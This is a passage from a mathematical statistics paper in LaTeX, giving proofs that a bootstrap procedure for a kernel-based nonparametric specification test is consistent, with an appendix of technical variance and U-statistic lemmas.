\tilde{\gamma}_{1n}^{2k}+\tilde{\gamma}_{2n}^{2k}\right) \qquad \forall 1\leq i\leq n \quad \mbox{and } \quad \forall k = 1,2 \in\left\{ 1,2\right\} \, .$$ Indeed, $ \hat{u}_{i}\hat{f}_{i} = u_{i}f_{i}+Y_{i}f_{i}f_{i}^{-1}\left(\hat{f}_{i}-f_{i}\right) +\left[\hat{r}_{i}\hat{f}_{i}-r_{i}f_{i}\right] = u_{i}f_{i}+Y_{i}f_{i}\gamma_{1i}-\gamma_{2i} $, where $\sup_{1\leq i\leq n}\left|\gamma_{ji}\right|\leq\tilde{\gamma_{j}}$ and $\tilde{\gamma_{j}}=o_{p}\left(1\right)$ by Lemma \[unif\_omeg\]. Hence $$\hat{u}_{i}^{2}\hat{f}_{i}^{2}\leq3\left(u_{i}^{2}f_{i}^{2}+Y_{i}^{2}f_{i}^{2} \tilde{\gamma}_{1n}^{2}+\tilde{\gamma}_{2n}^{2}\right) \, .$$ The inequality for $k=2$ is obtained similarly. Using these inequalities, one can bound the expectations of $|Q_{1n}|$ to $|Q_{6n}|$ and thus show that $|Q_{1n}|+\cdots+|Q_{6n}|=o_p(1)$. Next we show (\[r\_star\_1\]). First we need the following. Under the conditions of Theorem \[Bootstrap Consistency\], $\dfrac{\hat{\omega}_{n,FL}}{\hat{\omega}_{n,FL}^{*}}\xrightarrow{p}1 $ and $ \dfrac{\hat{\omega}_{n,FL}}{\hat{\omega}_{n,LV}^{*}}\xrightarrow{p}1 $. \[VarianceBootstrap\] The proof uses the following result, which is proved in the Appendix. \[DeltaUiStar\] Under the conditions of Theorem \[Bootstrap Consistency\], $\sup_{1\leq i\leq n} |\hat{u}_{i}^{*}\hat{f}_{i}-u_{i}^{*}\hat{f}_{i}| = o_{p}\left(1\right)$, where $u_{i}^{*} =\eta_{i} \widehat{u}_{i}$ and $$\hat{u}_{i}^{*} = Y_{i}^{*}-\dfrac{\sum_{k\neq i}Y_{k}^{*}L_{nik}}{\sum_{k\neq i}L_{nik}} \, .$$ Using Lemma \[DeltaUiStar\], we have $$\hat{\omega}_{n,FL}^{*2}=\omega_{n}^{*2}+o_{p}\left(1\right)$$ where $\omega_{n}^{*2}=\dfrac{2h^{p}}{n^{\left(2\right)}}\sum_{a}u_{i}^{*2}u_{j}^{*2}\hat{f}_{i}^{2}\hat{f}_{j}^{2}K_{nij}^{2}\psi_{ij}^{2}$. Notice that $\mathbb{E}\left[\omega_{n}^{*2}\mid\overline{Z}\right]=\hat{\omega}_{n,FL}^{2}$ and that $$\mbox{Var}\left(\omega_{n}^{*2}-\hat{\omega}_{n,FL}^{2}\right) = \mbox{Var}\left(\mathbb{E}\left[\omega_{n}^{*2}-\hat{\omega}_{n,FL}^{2}\mid\overline{Z}\right]\right) +\mathbb{E}\left[\mbox{Var}\left(\omega_{n}^{*2}\mid\overline{Z}\right)\right]$$ where the first term is zero and $$\mbox{Var}\left(\omega_{n}^{*2}\mid\overline{Z}\right)=\dfrac{8h^{2p}\mbox{Var}\left(\eta^{2}\right)}{\left\{n^{\left(2\right)}\right\}^{2}}\sum_{a}\hat{u}_{i}^{4}\hat{u}_{j}^{4}\hat{f}_{i}^{4}\hat{f}_{j}^{4}K_{nij}^{4}\psi_{ij}^{4}.$$ Then, $$\dfrac{\hat{\omega}_{n,FL}}{\hat{\omega}_{n,FL}^{*}}=1+\dfrac{\hat{\omega}_{n,FL}-\hat{\omega}_{n,FL}^{*}}{\hat{\omega}_{n,FL}^{*}}=1+\dfrac{o_{p}\left(1\right)}{\omega^{2}\left[1+o_{p}\left(1\right)\right]} = 1+o_p(1).$$ Since $\hat{\omega}_{n,LV}^{*}-\hat{\omega}_{n,FL}^{*}$ contains only diagonal terms, we deduce that $\hat{\omega}_{n,FL}/\hat{\omega}_{n,LV}^{*}\xrightarrow{p}1.$ We next have to bound $D_{n}^{*}=I_{n,LV}^{*}-I_{0n}^{*}.$ For this, let us decompose $$\hat{r}_{i}-\hat{r}_{k}=\left(\hat{r}_{i}-r_{i}\right)-\left(\hat{r}_{k}-r_{k}\right)+\left(r_{i}-r_{k}\right)$$ and replace all such differences appearing in the definition of $D_{n}^{*}$. First, let us look at $I_{3}^{*}$ which does not contain any bootstrap variable $\eta.$ We obtain $$\begin{aligned} I_{3}^{*} & = & \dfrac{1}{n^{\left(4\right)}}\sum_{a}\left(\hat{r}_{i}-\hat{r}_{k}\right)\left(\hat{r}_{j}-\hat{r}_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & = & \dfrac{1}{n^{\left(4\right)}}\sum_{a}\left(r_{i}-r_{k}\right)\left(r_{j}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij} \\ & & +\dfrac{1}{n^{\left(4\right)}}\sum_{a}\left(\hat{r}_{i}-r_{i}\right)\left(\hat{r}_{j}-r_{j}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & +\dfrac{1}{n^{\left(4\right)}}\sum_{a}\left(\hat{r}_{k}-r_{k}\right)\left(\hat{r}_{l}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & +\dfrac{2}{n^{\left(4\right)}}\sum_{a}\left(\hat{r}_{i}-r_{i}\right)\left(r_{j}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & -\dfrac{2}{n^{\left(4\right)}}\sum_{a}\left(\hat{r}_{k}-r_{k}\right)\left(r_{j}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & -\dfrac{2}{n^{\left(4\right)}}\sum_{a}\left(\hat{r}_{k}-r_{k}\right)\left(\hat{r}_{j}-r_{j}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & = & I_{3,1}^{*}+I_{3,2}^{*}+I_{3,3}^{*}+2I_{3,4}^{*}-2I_{3,5}^{*}-2I_{3,6}^{*}.\end{aligned}$$ Next, use the fact that $$\begin{aligned} \label{dsqa} \hat{r}_{i}-r_{i} & = & \left(n-1\right)^{-1}\hat{f}_{i}^{-1}\sum_{i^{\prime}\neq i}\left(Y_{i^{\prime}}-r_{i}\right)L_{nii^{\prime}}\nonumber \\ & = & \left(n-1\right)^{-1}\hat{f}_{i}^{-1}\sum_{i^{\prime}\neq i}\left(r_{i^{\prime}}-r_{i}\right)L_{nii^{\prime}}+\left(n-1\right)^{-1}\hat{f}_{i}^{-1}\sum_{i^{\prime}\neq i}u_{i^{\prime}}L_{nii^{\prime}}\end{aligned}$$ and further replace terms like $\hat{r}_{i}-r_{i}.$ Among the terms $I_{3,1}^{*}$ to $I_{3,6}^{*},$ the term $I_{3,1}^{*}$ could be easily handled with existing results in [@Lavergne2000]. Namely $nh^{p/2}I_{3,1}^{*}=nh^{p/2}O_p\left(g^{2s}\right)+o_p\left(1\right)$ by Proposition 7 of [@Lavergne2000]. For the other five terms we have to control the density estimates appearing in the denominators. For this purpose, let us introduce the notation $\Delta\left(f_{i}^{I}\right)^{-1}=\left(\hat{f}_{i}^{I}\right)^{-1}-f_{i}^{-1}$ and write $$\label{zzae} \dfrac{n-\left|I\right|}{n-1}\times\hat{f}_{i}^{-1} = \left(\dfrac{\left(n-\left|I\right|\right)\hat{f}_{i}^{I}}{\left(n-1\right)\hat{f}_{i}}-1\right)\left(\hat{f}_{i}^{I}\right)^{-1}+\left(\hat{f}_{i}^{I}\right)^{-1} = \dfrac{\sum_{k\in I}L_{nik}}{\left(n-1\right)\hat{f}_{i}\hat{f}_{i}^{I}}+\Delta\left(f_{i}^{I}\right)^{-1}+f_{i}^{-1}.$$ Then, we obtain for instance $$\begin{aligned} I_{3,5}^{*}&= & \dfrac{1}{n^{\left(4\right)}}\sum_{a}\left(\hat{r}_{k}-r_{k}\right)\left(r_{j}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & = & \dfrac{1}{n^{\left(5\right)}}\sum_{a\left(4\right)}\sum_{k^{\prime}\neq k}f_{k}^{-1}\left(r_{k^{\prime}}-r_{k}\right)\left(r_{j}-r_{l}\right)L_{nkk^{\prime}}L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & +\dfrac{1}{n^{\left(5\right)}}\sum_{a\left(4\right)}\sum_{k^{\prime}\neq k}\Delta\left(f_{k}^{i,j,l,k^{\prime}}\right)^{-1}\left(r_{k^{\prime}}-r_{k}\right)\left(r_{j}-r_{l}\right)L_{nkk^{\prime}}L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & +\dfrac{1}{\left(n-1\right)n^{\left(5\right)}}\sum_{a\left(4\right)}\sum_{k^{\prime}\neq k}\left(\hat{f}_{k}\hat{f}_{k}^{i,j,l,k^{\prime}}\right)^{-1}\left(L_{nik}+L_{njk}+L_{nlk}+L_{nk^{\prime}k}\right)\\ && \qquad \qquad \qquad \qquad \qquad \qquad \times \left(r_{k^{\prime}}-r_{k}\right)\left(r_{j}-r_{l}\right)L_{nkk^{\prime}}L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & +\dfrac{1}{n^{\left(5\right)}}\sum_{a\left(4\right)}\sum_{k^{\prime}\neq k}f_{k}^{-1}u_{k^{\prime}}\left(r_{j}-r_{l}\right)L_{nkk^{\prime}}L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & +\dfrac{1}{n^{\left(5\right)}}\sum_{a\left(4\right)}\sum_{k^{\prime}\neq k}\Delta f_{k}^{-1}u_{k^{\prime}}\left(r_{j}-r_{l}\right)L_{nkk^{\prime}}L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & +\dfrac{1}{\left(n-1\right)n^{\left(5\right)}}\sum_{a\left(4\right)}\sum_{k^{\prime}\neq k}\left(\hat{f}_{k}\hat{f}_{k}^{i,j,l,k^{\prime}}\right)^{-1}\left(L_{nik}+L_{njk}+L_{nlk}+L_{nk^{\prime}k}\right)\\ && \qquad \qquad \qquad \qquad \qquad \qquad \times u_{k^{\prime}}\left(r_{j}-r_{l}\right)L_{nkk^{\prime}}L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & = & I_{3,5,1}^{*}+I_{3,5,2}^{*}+I_{3,5,3}^{*}+I_{3,5,4}^{*}+I_{3,5,5}^{*}+I_{3,5,6}^{*}.\end{aligned}$$ Next, if we consider for instance $I_{3,5,1}^{*}$ that contains only terms like $f_{i}^{-1}$ appearing from the decomposition \[zzae\], we obtain $$\begin{aligned} I_{3,5,1}^{*} & = & \dfrac{1}{n^{\left(5\right)}}\sum_{a\left(5\right)}f_{k}^{-1}\left(r_{k^{\prime}}-r_{k}\right)\left(r_{j}-r_{l}\right)L_{nkk^{\prime}}L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & +\dfrac{1}{n^{\left(5\right)}}\sum_{a\left(4\right)}f_{k}^{-1}\left(r_{i}-r_{k}\right)\left(r_{j}-r_{l}\right)L_{nik}^{2}L_{njl}K_{nij}\psi_{ij}\\ & & +\dfrac{1}{n^{\left(5\right)}}\sum_{a\left(4\right)}f_{k}^{-1}\left(r_{j}-r_{k}\right)\left(r_{j}-r_{l}\right)L_{njk}L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & +\dfrac{1}{n^{\left(5\right)}}\sum_{a\left(4\right)}f_{k}^{-1}\left(r_{l}-r_{k}\right)\left(r_{j}-r_{l}\right)L_{nlk}L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & = & I_{3,5,1,1}^{*}+I_{3,5,1,2}^{*}+I_{3,5,1,3}^{*}+I_{3,5,1,4}^{*}\end{aligned}$$ where the terms $I_{3,5,1,2}^{*}$ to $I_{3,5,1,4}^{*}$ are called “diagonal terms”. Such terms require more restrictions on the bandwidths. next, the terms with containing terms like $\Delta\left(f_{i}^{I}\right)^{-1}$ produced by the decomposition (\[zzae\]) can be treated like in the Propositions 8 to 11 of Lavergne et Vuong (2000). Finally, given that $I$ is finite and with fixed cardinal $$\left(n-1\right)^{-1}\hat{f}_{i}^{-1}\left(\hat{f}_{i}^{I}\right)^{-1}\sum_{k\in I}L_{nik}=O_{p}\left(n^{-1}g^{-p}\right)=o_p(1)$$ given that $\left\Vert f^{-1}\right\Vert _{\infty}<\infty.$ Therefore the terms of $I_{3}^{*}$ containing $\left(n-1\right)^{-1}\hat{f}_{i}^{-1}\left(\hat{f}_{i}^{I}\right)^{-1}\sum_{k\in I}L_{nik}$ can be easily handled by taking absolute values. Now let us investigate the diagonal term $I_{3,5,1,2}^{*}$. We have $$\begin{aligned} \label{eq:diagonalTerm} \mathbb{E}\left[|I_{3,5,1,2}^{*}|\right] \nonumber & = & O\left(n^{-1}\right)\mathbb{E}\left[f_{k}^{-1}\left|r_{j}-r_{k}\right|\left|r_{j}-r_{l}\right||L_{njk}||L_{nik}||L_{njl}||K_{nij}|\right]\nonumber\\ & = & O\left(n^{-1}g^{-p}\right)\mathbb{E}\left[f_{k}^{-1}\left|r_{j}-r_{k}\right|\left|r_{j}-r_{l}\right||L_{njk}||L_{njl}||K_{nij}|\right]\nonumber\\ & = & O\left(n^{-1}g^{-p}\right)\mathbb{E}\left[f_{k}^{-1}\left|r_{j}-r_{k}\right||L_{njk}|\mathbb{E}\left[\left|r_{j}-r_{l}\right||L_{njl}|\mid Z_{j}\right]|K_{nij}|\right]\nonumber\\ & = & o\left(n^{-1}g^{-p}\right)\mathbb{E}\left[f_{k}^{-1}\left|r_{j}-r_{k}\right||L_{njk}||K_{nij}|\right]\nonumber\\ & = & o\left(n^{-1}g^{-p}\right)\nonumber.\end{aligned}$$ To prove that he term $I_{3,5,1,2}^{*}= o_p(nh^{p/2})$ it suffices to prove $\mathbb{E}\left[|I_{3,5,1,2}^{*}|\right]= o(nh^{p/2})$ and this latter rate is implied by the condition $h/g^2 = o(1).$ This additional condition on the bandwidths is not surprising as the bootstrapped statistic introduced “diagonal” terms as in Fan et Li (1996) which indeed require the condition $h/g^{2}\to 0$. Let us now consider a term in the decomposition of $D_{n}^{*}$ that involve bootstrap variables $\eta$, namely we investigate $I_{2}^{*}.$ The arguments for the other terms are similar. Consider $$\begin{aligned} I_{2}^{*} & = & \dfrac{1}{n^{\left(4\right)}}\sum_{a}\left(\eta_{i}\hat{u}_{i}-\eta_{k}\hat{u}_{k}\right)\left(\hat{r}_{j}-\hat{r}_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & = & \dfrac{1}{n^{\left(4\right)}}\sum_{a}\eta_{i}\hat{u}_{i}\left(r_{j}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij} +\dfrac{1}{n^{\left(4\right)}}\sum_{a}\eta_{i}\hat{u}_{i}\left(\hat{r}_{j}-r_{j}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & -\dfrac{1}{n^{\left(4\right)}}\sum_{a}\eta_{i}\hat{u}_{i}\left(\hat{r}_{l}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij} -\dfrac{1}{n^{\left(4\right)}}\sum_{a}\eta_{k}\hat{u}_{k}\left(r_{j}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & -\dfrac{1}{n^{\left(4\right)}}\sum_{a}\eta_{k}\hat{u}_{k}\left(\hat{r}_{j}-r_{j}\right)L_{nik}L_{njl}K_{nij}\psi_{ij} +\dfrac{1}{n^{\left(4\right)}}\sum_{a}\eta_{k}\hat{u}_{k}\left(\hat{r}_{l}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & = & I_{2,1}^{*}+I_{2,2}^{*}-I_{2,3}^{*}-I_{2,4}^{*}-I_{2,5}^{*}+I_{2,6}^{*}.\end{aligned}$$ Next it suffices to use the fact that $$\hat{u}_{i}=u_{i}-\hat{f}_{i}^{-1}\sum_{i^{\prime}\neq i}u_{i^{\prime}}L_{nii^{\prime}}+\hat{f}_{i}^{-1}\sum_{i^{\prime}\neq i}\left(r_{i}-r_{i^{\prime}}\right)L_{nii^{\prime}}.$$ For instance, using this identity with $I_{2,1}^{*}$ we can write $$\begin{aligned} I_{2,1}^{*} & = & \dfrac{1}{n^{\left(4\right)}}\sum_{a}\eta_{i}u_{i}\left(r_{j}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & -\dfrac{1}{\left(n-1\right)n^{\left(4\right)}}\sum_{a}\sum_{i^{\prime}\neq i}\hat{f}_{i}^{-1}\eta_{i}u_{i^{\prime}}\left(r_{j}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & +\dfrac{1}{\left(n-1\right)n^{\left(4\right)}}\sum_{a}\sum_{i^{\prime}\neq i}\hat{f}_{i}^{-1}\eta_{i}\left(r_{i}-r_{i^{\prime}}\right)\left(r_{j}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & = & \dfrac{1}{n^{\left(3\right)}}\sum_{a}\eta_{i}u_{i}f_{i}\left(r_{j}-r_{l}\right)L_{njl}K_{nij}\psi_{ij}\\ & & +\dfrac{1}{n^{\left(4\right)}}\sum_{a}\eta_{i}u_{i}\left(r_{j}-r_{l}\right)\Delta f_{i}^{j,l}L_{njl}K_{nij}\psi_{ij}\\ & & -\dfrac{1}{\left(n-1\right)n^{\left(4\right)}}\sum_{a}\sum_{i^{\prime}\neq i}f_{i}^{-1}\eta_{i}u_{i^{\prime}}\left(r_{j}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & -\dfrac{1}{n^{\left(5\right)}}\sum_{a}\Delta\left(f_{i}^{j,k,l,i^{\prime}}\right)^{-1}\eta_{i}u_{i^{\prime}}\left(r_{j}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & -\dfrac{1}{\left(n-1\right)n^{\left(4\right)}}\sum_{a}\sum_{i^{\prime}\neq i}\left(\hat{f}_{i}\hat{f}_{i}^{j,k,l,i^{\prime}}\right)^{-1}\eta_{i}u_{i^{\prime}}\left(r_{j}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & +\dfrac{1}{\left(n-1\right)n^{\left(4\right)}}\sum_{a}\sum_{i^{\prime}\neq i}f_{i}^{-1}\eta_{i}\left(r_{i}-r_{i^{\prime}}\right)\left(r_{j}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & +\dfrac{1}{n^{\left(5\right)}}\sum_{a}\Delta\left(f_{i}^{j,k,l,i^{\prime}}\right)^{-1}\eta_{i}\left(r_{i}-r_{i^{\prime}}\right)\left(r_{j}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & & +\dfrac{1}{n^{\left(5\right)}}\sum_{a}\left(\hat{f}_{i}\hat{f}_{i}^{j,k,l,i^{\prime}}\right)^{-1}\eta_{i}\left(r_{i}-r_{i^{\prime}}\right)\left(r_{j}-r_{l}\right)L_{nik}L_{njl}K_{nij}\psi_{ij}\\ & = & I_{2,1,1}^{*}+I_{2,1,2}^{*}+I_{2,1,3}^{*}+I_{2,1,4}^{*}+I_{2,1,5}^{*}+I_{2,1,6}^{*}+I_{2,1,7}^{*}+I_{2,1,8}^{*}\end{aligned}$$ Handling one problem at a time, let us notice that $I_{2,1,1}^{*}$ is a zero-mean $U-$statistic of order three with kernel $H_{n}\left(Z_{i}^{*},Z_{j}^{*},Z_{l}^{*}\right)=\eta_{i}u_{i}f_{i}\left(r_{j}-r_{l}\right)L_{njl}K_{nij}\psi_{ij}$ where $Z_{i}^{*}=\left(Y_{i},W_{i},X_{i},\eta_{i}\right)$. Using the Hoeffding decomposition of $I_{2,1,1}^{*}$ in degenerate $U-$statistics, it is easy to check that the third and second order projections are small. For the first order degenerate $U-$statistic it suffices to note that $\mathbb{E}\left[H_{n}\mid Z_{j}^{*}\right]=\mathbb{E}\left[H_{n}\mid Z_{l}^{*}\right]=0$ and $\mathbb{E}\left[H_{n}\mid Z_{i}^{*}\right]=\eta_{i}u_{i}f_{i}\mathbb{E}\left[\left(r_{j}-r_{l}\right)L_{njl}K_{nij}\psi_{ij}\mid Z_{i}\right]$ so that $$\begin{aligned} \mathbb{E}\left[\mathbb{E}^{2}\left[H_{n}\mid Z_{i}^{*}\right]\right] & = & \mathbb{E}\left[\eta_{i}^{2}u_{i}^{2}f_{i}^{2}\mathbb{E}^{2}\left[\left(r_{j}-r_{l}\right)L_{njl}K_{nij}\psi_{ij}\mid Z_{i}\right]\right]\\ & = & \mathbb{E}\left[u_{i}^{2}f_{i}^{2}\mathbb{E}^{2}\left[\left(r_{j}-r_{l}\right)L_{njl}K_{nij}\psi_{ij}\mid Z_{i}\right]\right]\end{aligned}$$ which, given that $\left\Vert \psi\right\Vert _{\infty}<\infty,$ is similar to the term $\xi_1$ bounded in the proof of Proposition 5 of Lavergne et Vuong (2000). Finally, let us briefly consider the case $I_n^{*}=\tilde{I}_n.$ Like in the decomposition (\[ilvifl\]), we have $$n\left(n-1\right)^{3}I_{n,FL}^{*}=n^{\left(4\right)}I_{n,LV}^{*}+n^{\left(3\right)}V_{1n}^{*}+2n^{\left(3\right)}V_{2n}^{*}-n^{\left(2\right)}V_{3n}^{*}$$ where $\forall j\in\left\{ 1,2,3\right\} $, the $V_{jn}^{*}$s are obtained by replacing the $Y_{i}$s by the $Y_{i}^{*}$s in the $V_{jn}$s. All these terms could be handled by arguments similar to the ones detailed above. The proof of Theorem \[Bootstrap Consistency\] is now complete. Appendix (not for publication) {#appendix-not-for-publication .unnumbered} ============================== We here provide proofs of technical lemmas and additional details for the proofs in the manuscript. We define $Z_{i} = \left( Y_{i}, W_{i}, X_{i}\right)$, $\|\psi\|_\infty=\sup_{x\in\mathbb{R}^q} |\psi(x)|$, $$\mathbf{K}_{nij} = |K_{nij}| = \frac{1}{h^p} \left|K\left( \frac{W_i - W_j}{h}\right)\right|, \qquad \mbox{and}\qquad \mathbf{L}_{nij} = |L_{nij}| = \frac{1}{g^p} \left|L\left( \frac{W_i - W_j}{g}\right)\right| \, .$$ 1\. We have $$\mathbb{E}\left[A_{n}\right] = \dfrac{4h^{p}}{\left(n-1\right)^{2}}\sum_{i=2}^{n}\sum_{j=1}^{i-1}\mathbb{E}\left[\sigma_{i}^{2}f_{i}^{2}\sigma_{j}^{2}f_{j}^{2}K_{nij}^{2}\psi_{ij}^{2}\right] = \dfrac{2n h^{p}}{n-1} \mathbb{E}\left[\sigma_{i}^{2}f_{i}^{2}\sigma_{j}^{2}f_{j}^{2}K_{nij}^{2}\psi_{ij}^{2}\right],$$ and $$\begin{aligned} \mbox{Var}\left[A_{n}\right] & \leq & \dfrac{64h^{2p}\left\Vert \psi\right\Vert _{\infty}^{4}}{\left(n-1\right)^{4}}\sum_{i=3}^{n}\sum_{j=2}^{i-1}\sum_{j^{\prime}=1}^{j-1}\mathbb{E}\left[\sigma_{i}^{4}f_{i}^{4}\sigma_{j}^{2}f_{j}^{2}\sigma_{j^{\prime}}^{2}f_{j^{\prime}}^{2}K_{nij}^{2}K_{nij^{\prime}}^{2}\right]\\ & & +\dfrac{32h^{2p}\left\Vert \psi\right\Vert _{\infty}^{4}}{\left(n-1\right)^{4}}\sum_{i=3}^{n}\sum_{i^{\prime}=1}^{i-1}\sum_{j=2}^{i^{\prime}-1}\mathbb{E}\left[\sigma_{i}^{2}f_{i}^{2}\sigma_{i^{\prime}}^{2}f_{i^{\prime}}^{2}u_{j}^{4}f_{j}^{4}K_{nij}^{2}K_{ni^{\prime}j}^{2}\right]\\ & & +\dfrac{16h^{2p}\left\Vert \psi\right\Vert _{\infty}^{4}}{\left(n-1\right)^{4}}\sum_{i=2}^{n}\sum_{j=1}^{i-1}\mathbb{E}\left[\sigma_{i}^{4}f_{i}^{4}u_{j}^{4}f_{j}^{4}K_{nij}^{4}\right]\\ & = & O\left(n^{-1}\right)\mathbb{E}\left[\sigma_{i}^{4}f_{i}^{4}\sigma_{j}^{2}f_{j}^{2}\sigma_{k}^{2}f_{k}^{2}\mathbf{K}_{nij}\mathbf{K}_{nik}\right] +O\left(n^{-1}\right)\mathbb{E}\left[\sigma_{i}^{2}f_{i}^{2}\sigma_{i^{\prime}}^{2}f_{i^{\prime}}^{2}u_{j}^{4}f_{j}^{4}\mathbf{K}_{nij}\mathbf{K}_{ni^{\prime}j}\right] \\ &&+O\left(n^{-2}h^{-p}\right)\mathbb{E}\left[\sigma_{i}^{4}f_{i}^{4}u_{j}^{4}f_{j}^{4}\mathbf{K}_{nij}\right]\\ & = & O\left(n^{-1}\right)+O\left(n^{-2}h^{-p}\right).\end{aligned}$$ Deduce that $\mbox{Var}\left[A_{n}\right]\rightarrow 0,$ and hence remains to show that $\mathbb{E}[A_n]\rightarrow \omega ^2.$ We have $$h^{p}\;\mathbb{E}\left[\sigma_{i}^{2}f_{i}^{2}\sigma_{j}^{2}f_{j}^{2}K_{nij}^{2}\psi_{ij}^{2}\right]\\ = \mathbb{E}\left[ \int \varphi_{X_{i}}\left(t\right)\varphi_{X_{j}}\left(-t\right)\mathcal{F}\left[K^{2}\right]\left(ht\right)\psi^{2}\left(X_{i}-X_{j}\right)dt\right]$$ where $\varphi_{x}\left(t\right)=\mathcal{F}\left[\sigma^{2}\left(\cdot,x\right)f^{2}\left(\cdot\right)\pi\left(\cdot\mid x\right)\right]\left(t\right)$. Let us note that $$\begin{aligned} \mathbb{E}\left[ \int \left| \varphi_{X_{i}}\left(t\right)\varphi_{X_{j}}\left(-t\right)\right| \psi^{2}\left(X_{i}-X_{j}\right)dt\right] &\leq &\|\psi\|_\infty \; \mathbb{E}\left[ \int \left| \varphi_{X}\left(t\right)\right|^2 dt\right] \\ & = & \|\psi\|_\infty \;\mathbb{E}\left[\sigma^{4}\left(W,X\right)f^{4}\left(W\right)\pi\left(W\mid X\right)\right],\end{aligned}$$ by Plancherel Theorem. Moreover, $\mathcal{F}\left[K^{2}\right]\left(ht\right)$ is bounded and converges pointwise to $\int K^{2}\left(s\right)ds$ as $h\to0$. Then by Lebesgue’s dominated convergence theorem, $$h^{p}\; \mathbb{E}\left[\sigma_{i}^{2}f_{i}^{2}\sigma_{j}^{2}f_{j}^{2}K_{nij}^{2} \psi_{ij}^{2}\right] \to \mathbb{E}\left[\int \varphi_{X_{i}}\left(t\right)\varphi_{X_{j}}\left(-t\right) \psi^{2}\left(X_{i}-X_{j}\right)dt \right] \int K^{2}\left(s\right)\, ds = \omega^2 \, ,$$ by Parseval’s Theorem. 2. By elementary calculations, $$\begin{aligned} \mathbb{E}\left[B_{n}^{2}\right] & = & \dfrac{64h^{2p}}{\left(n-1\right)^{4}}\sum_{i=3}^{n}\sum_{i^{\prime}=3}^{n}\sum_{j=2}^{i-1} \sum_{j^{\prime}=2}^{i^{\prime}-1}\sum_{k=1}^{j-1}\sum_{k^{\prime}=1}^{j^{\prime}-1} \mathbb{E}\left[\sigma_{i}^{2}f_{i}^{2}\sigma_{i^{\prime}}^{2}f_{i^{\prime}}^{2}u_{j} f_{j}u_{j^{\prime}}f_{j^{\prime}}u_{k}f_{k}u_{k^{\prime}}f_{k^{\prime}}\right.\\ & & \left.\times K_{nij}K_{ni^{\prime}j^{\prime}}K_{nik}K_{ni^{\prime}k^{\prime}}\psi_{ij} \psi_{i^{\prime}j^{\prime}}\psi_{ik}\psi_{i^{\prime}k^{\prime}}\right]\\ & \leq & \dfrac{64h^{2p}\left\Vert \psi\right\Vert _{\infty}^{4}}{\left(n-1\right)^{4}}\sum_{i=3}^{n}\sum_{i^{\prime}=3}^{n} \sum_{j=2}^{i\wedge i^{\prime}-1}\sum_{k=1}^{j-1}\mathbb{E}\left[\sigma_{i}^{2}f_{i}^{2}\sigma_{i^{\prime}}^{2}f_{i^{\prime}}^{2}\sigma_{j}^{2}f_{j}^{2}\sigma_{k}^{2}f_{k}^{2}K_{nij}K_{ni^{\prime}j}K_{nik}K_{ni^{\prime}k}\right]\\ & = & \dfrac{64h^{2p}\left\Vert \psi\right\Vert _{\infty}^{4}}{\left(n-1\right)^{4}}\sum_{i=3}^{n}\sum_{j=2}^{i-1}\sum_{k=1}^{j-1}\mathbb{E}\left[\sigma_{i}^{4}f_{i}^{4}\sigma_{j}^{2}f_{j}^{2}\sigma_{k}^{2}f_{k}^{2}K_{nij}^{2}K_{nik}^{2}\right]\\ & & +\dfrac{128h^{2p}\left\Vert \psi\right\Vert _{\infty}^{4}}{\left(n-1\right)^{4}}\sum_{i=3}^{n}\sum_{i^{\prime}=3}^{i-1} \sum_{j=2}^{i^{\prime}-1}\sum_{k=1}^{j-1}\mathbb{E}\left[\sigma_{i}^{2}f_{i}^{2}\sigma_{i^{\prime}}^{2}f_{i^{\prime}}^{2}\sigma_{j}^{2}f_{j}^{2}\sigma_{k}^{2}f_{k}^{2}K_{nij}K_{ni^{\prime}j}K_{nik}K_{ni^{\prime}k}\right]\\ & = & O\left(n^{-1}\right)\mathbb{E}\left[\sigma_{i}^{4}f_{i}^{4}\sigma_{j}^{2}f_{j}^{2}\sigma_{k}^{2}f_{k}^{2}\mathbf{K}_{nij}\mathbf{K}_{nik}\right] +O\left(h^{p}\right)\mathbb{E}\left[\sigma_{i}^{2}f_{i}^{2}\sigma_{i^{\prime}}^{2}f_{i^{\prime}}^{2}\sigma_{j}^{2}f_{j}^{2}\sigma_{k}^{2}f_{k}^{2}\mathbf{K}_{nij}\mathbf{K}_{ni^{\prime}j}\mathbf{K}_{nik}\right]\\ & = & O\left(n^{-1}\right)+O\left(h^{p}\right) = o(1)\, .\end{aligned}$$ 3. We have $\forall\varepsilon>0$, $\forall n\geq1$, and $1< i\leq n$, $$\begin{aligned} \mathbb{E}\left[G_{n,i}^{2}I\left(\left|G_{n,i}\right|>\varepsilon\right) \mid\mathcal{F}_{n,i-1}\right] &\leq & 